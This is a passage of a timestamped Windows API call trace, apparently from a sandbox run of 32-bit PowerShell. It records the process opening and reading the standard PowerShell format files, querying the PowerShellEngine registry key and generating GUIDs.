lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.196] GetLastError () returned 0xcb [0144.196] SetErrorMode (uMode=0x1) returned 0x1 [0144.196] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2de8b8 | out: lpFileInformation=0x2de8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0144.197] GetLastError () returned 0xcb [0144.197] SetErrorMode (uMode=0x1) returned 0x1 [0144.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0144.197] GetLastError () returned 0xcb [0144.197] SetErrorMode (uMode=0x1) returned 0x1 [0144.197] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2de8b8 | out: lpFileInformation=0x2de8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0144.199] GetLastError () returned 0xcb [0144.199] SetErrorMode (uMode=0x1) returned 0x1 [0144.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.200] GetLastError () returned 0xcb [0144.200] SetErrorMode (uMode=0x1) returned 0x1 [0144.200] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2de8b8 | out: lpFileInformation=0x2de8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0144.200] GetLastError () returned 0xcb [0144.200] SetErrorMode (uMode=0x1) returned 0x1 [0144.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.200] GetLastError () returned 0xcb [0144.200] SetErrorMode (uMode=0x1) returned 0x1 [0144.200] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2de8b8 | out: lpFileInformation=0x2de8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0144.200] GetLastError () returned 0xcb [0144.201] SetErrorMode (uMode=0x1) returned 0x1 [0144.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0144.201] GetLastError () returned 0xcb [0144.201] SetErrorMode (uMode=0x1) returned 0x1 [0144.201] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2de8b8 | out: lpFileInformation=0x2de8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0144.201] GetLastError () returned 0xcb [0144.201] SetErrorMode (uMode=0x1) returned 0x1 [0144.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0144.201] GetLastError () returned 0xcb [0144.201] SetErrorMode (uMode=0x1) returned 0x1 [0144.201] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2de8b8 | out: lpFileInformation=0x2de8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0144.201] GetLastError () returned 0xcb [0144.201] SetErrorMode (uMode=0x1) returned 0x1 [0144.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0144.201] GetLastError () returned 0xcb [0144.201] SetErrorMode (uMode=0x1) returned 0x1 [0144.202] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2de8b8 | out: lpFileInformation=0x2de8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0144.202] GetLastError () returned 0xcb [0144.202] SetErrorMode (uMode=0x1) returned 0x1 [0144.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0144.202] GetLastError () returned 0xcb [0144.202] SetErrorMode (uMode=0x1) returned 0x1 [0144.202] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2de8b8 | out: lpFileInformation=0x2de8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0144.202] GetLastError () returned 0xcb [0144.202] SetErrorMode (uMode=0x1) returned 0x1 [0144.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0144.203] GetLastError () returned 0xcb [0144.203] SetErrorMode (uMode=0x1) returned 0x1 [0144.203] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2de8b8 | out: lpFileInformation=0x2de8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0144.203] GetLastError () returned 0xcb [0144.203] SetErrorMode (uMode=0x1) returned 0x1 [0144.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0144.205] GetLastError () returned 0xcb [0144.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0144.288] GetLastError () returned 0xcb [0144.289] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0144.289] GetLastError () returned 0xcb [0144.291] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0144.291] GetLastError () returned 0xcb [0144.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.292] GetLastError () returned 0xcb [0144.292] SetErrorMode (uMode=0x1) returned 0x1 [0144.292] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0144.292] GetLastError () returned 0x0 [0144.292] GetFileType (hFile=0x31c) returned 0x1 [0144.292] SetErrorMode (uMode=0x1) returned 0x1 [0144.292] GetFileType (hFile=0x31c) returned 0x1 [0144.292] ReadFile (in: hFile=0x31c, lpBuffer=0x2fde59c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2fde59c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.302] GetLastError () returned 0x0 [0144.313] ReadFile (in: hFile=0x31c, lpBuffer=0x2fde59c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2fde59c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.313] GetLastError () returned 0x0 [0144.314] ReadFile (in: hFile=0x31c, lpBuffer=0x2fde59c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2fde59c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.314] GetLastError () returned 0x0 [0144.314] ReadFile (in: hFile=0x31c, lpBuffer=0x2fde59c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2fde59c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.314] GetLastError () returned 0x0 [0144.314] ReadFile (in: hFile=0x31c, lpBuffer=0x2fde59c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2fde59c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.314] GetLastError () returned 0x0 [0144.314] ReadFile (in: hFile=0x31c, lpBuffer=0x2fde59c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2fde59c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.314] GetLastError () returned 0x0 [0144.314] ReadFile (in: hFile=0x31c, lpBuffer=0x2fde59c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2fde59c*, lpNumberOfBytesRead=0x2de734*=0x9e2, lpOverlapped=0x0) returned 1 [0144.314] GetLastError () returned 0x0 [0144.314] ReadFile (in: hFile=0x31c, lpBuffer=0x2fddb1e, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2fddb1e*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0144.314] GetLastError () returned 0x0 [0144.315] ReadFile (in: hFile=0x31c, lpBuffer=0x2fde59c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2fde59c*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0144.315] GetLastError () returned 0x0 [0144.315] CloseHandle (hObject=0x31c) returned 1 [0144.315] GetLastError () returned 0x0 [0144.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.315] GetLastError () returned 0x0 [0144.315] SetErrorMode (uMode=0x1) returned 0x1 [0144.315] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2fef658 | out: lpFileInformation=0x2fef658*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0144.315] GetLastError () returned 0x0 [0144.315] SetErrorMode (uMode=0x1) returned 0x1 [0144.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.315] GetLastError () returned 0x0 [0144.315] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de6b8 | out: phkResult=0x2de6b8*=0x31c) returned 0x0 [0144.316] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x0, lpcbData=0x2de6fc*=0x0 | out: lpType=0x2de700*=0x1, lpData=0x0, lpcbData=0x2de6fc*=0x56) returned 0x0 [0144.316] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x3da558, lpcbData=0x2de6fc*=0x56 | out: lpType=0x2de700*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2de6fc*=0x56) returned 0x0 [0144.316] RegCloseKey (hKey=0x31c) returned 0x0 [0144.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.316] GetLastError () returned 0x0 [0144.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de1f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.316] GetLastError () returned 0x0 [0144.527] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xd3ccc4c1, Data2=0x1b85, Data3=0x4452, Data4=([0]=0x8d, [1]=0xba, [2]=0x8b, [3]=0x97, [4]=0xf, [5]=0xa6, [6]=0xe6, [7]=0x3))) returned 0x0 [0144.566] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xc460170a, Data2=0x342d, Data3=0x4510, Data4=([0]=0x99, [1]=0x9a, [2]=0x7b, [3]=0x52, [4]=0xcc, [5]=0xcc, [6]=0x35, [7]=0x47))) returned 0x0 [0144.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0144.568] GetLastError () returned 0x0 [0144.568] SetErrorMode (uMode=0x1) returned 0x1 [0144.568] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0144.569] GetLastError () returned 0x0 [0144.569] GetFileType (hFile=0x31c) returned 0x1 [0144.569] SetErrorMode (uMode=0x1) returned 0x1 [0144.569] GetFileType (hFile=0x31c) returned 0x1 [0144.569] ReadFile (in: hFile=0x31c, lpBuffer=0x3002940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3002940*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.579] GetLastError () returned 0x0 [0144.580] ReadFile (in: hFile=0x31c, lpBuffer=0x3002940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3002940*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.580] GetLastError () returned 0x0 [0144.580] ReadFile (in: hFile=0x31c, lpBuffer=0x3002940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3002940*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.580] GetLastError () returned 0x0 [0144.581] ReadFile (in: hFile=0x31c, lpBuffer=0x3002940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3002940*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.581] GetLastError () returned 0x0 [0144.581] ReadFile (in: hFile=0x31c, lpBuffer=0x3002940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3002940*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.581] GetLastError () returned 0x0 [0144.582] ReadFile (in: hFile=0x31c, lpBuffer=0x3002940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3002940*, lpNumberOfBytesRead=0x2de734*=0xfb2, lpOverlapped=0x0) returned 1 [0144.582] GetLastError () returned 0x0 [0144.582] ReadFile (in: hFile=0x31c, lpBuffer=0x3002092, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3002092*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0144.582] GetLastError () returned 0x0 [0144.582] ReadFile (in: hFile=0x31c, lpBuffer=0x3002940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3002940*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0144.582] GetLastError () returned 0x0 [0144.582] CloseHandle (hObject=0x31c) returned 1 [0144.582] GetLastError () returned 0x0 [0144.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0144.582] GetLastError () returned 0x0 [0144.582] SetErrorMode (uMode=0x1) returned 0x1 [0144.583] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x30231d0 | out: lpFileInformation=0x30231d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0144.583] GetLastError () returned 0x0 [0144.583] SetErrorMode (uMode=0x1) returned 0x1 [0144.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0144.583] GetLastError () returned 0x0 [0144.583] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de6b8 | out: phkResult=0x2de6b8*=0x31c) returned 0x0 [0144.583] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x0, lpcbData=0x2de6fc*=0x0 | out: lpType=0x2de700*=0x1, lpData=0x0, lpcbData=0x2de6fc*=0x56) returned 0x0 [0144.583] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x3da558, lpcbData=0x2de6fc*=0x56 | out: lpType=0x2de700*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2de6fc*=0x56) returned 0x0 [0144.583] RegCloseKey (hKey=0x31c) returned 0x0 [0144.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0144.584] GetLastError () returned 0x0 [0144.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de1f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0144.584] GetLastError () returned 0x0 [0144.585] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x60e8c535, Data2=0x7b76, Data3=0x4702, Data4=([0]=0xb6, [1]=0x39, [2]=0xce, [3]=0x9a, [4]=0x7b, [5]=0x3d, [6]=0x97, [7]=0x96))) returned 0x0 [0144.628] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x59aae773, Data2=0x68c6, Data3=0x4e04, Data4=([0]=0xa6, [1]=0xa9, [2]=0x18, [3]=0x36, [4]=0x3d, [5]=0xae, [6]=0x7f, [7]=0x43))) returned 0x0 [0144.654] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x5f466f08, Data2=0x726f, Data3=0x49a1, Data4=([0]=0x87, [1]=0x54, [2]=0x54, [3]=0xdb, [4]=0xb4, [5]=0xf, [6]=0xcb, [7]=0x23))) returned 0x0 [0144.655] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xfbb110f0, Data2=0x8a01, Data3=0x4ac6, Data4=([0]=0xb6, [1]=0xd4, [2]=0x51, [3]=0x2b, [4]=0xf, [5]=0x7b, [6]=0x48, [7]=0x61))) returned 0x0 [0144.655] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xf0ab2b3, Data2=0xdda1, Data3=0x45a5, Data4=([0]=0x83, [1]=0x3f, [2]=0xea, [3]=0x16, [4]=0x1f, [5]=0x8a, [6]=0x8, [7]=0x1f))) returned 0x0 [0144.655] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xee0ad046, Data2=0x3ecf, Data3=0x4d3f, Data4=([0]=0xb7, [1]=0x9, [2]=0xf5, [3]=0x46, [4]=0xfc, [5]=0xe9, 